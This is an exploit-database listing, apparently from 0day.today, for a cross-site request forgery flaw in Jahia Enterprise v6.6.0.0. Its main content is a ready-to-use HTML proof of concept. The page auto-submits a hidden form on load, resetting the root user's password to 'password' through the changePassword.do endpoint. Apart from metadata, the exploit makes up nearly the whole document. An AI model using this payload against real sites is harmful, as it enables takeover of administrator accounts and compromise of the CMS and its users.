[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Jahia Enterprise v6.6.0.0 CSRF Vulnerability

Author
D4RKCR1PT3R
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-19925
Category
web applications
Date add
09-12-2012
Platform
jsp
A.B.C.D = URL, EXAMPLE: http://localhost:8080/cms/en/users/root.changePassword.do
<html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>CSRF Exploit to change Password</H2>
 <form method="POST" name="form0" action="A.B.C.D">
 <input type="hidden" name="password" value="password"/>
 <input type="hidden" name="passwordconfirm" value="password"/>
</form>
</html>

#  0day.today [2024-11-16]  #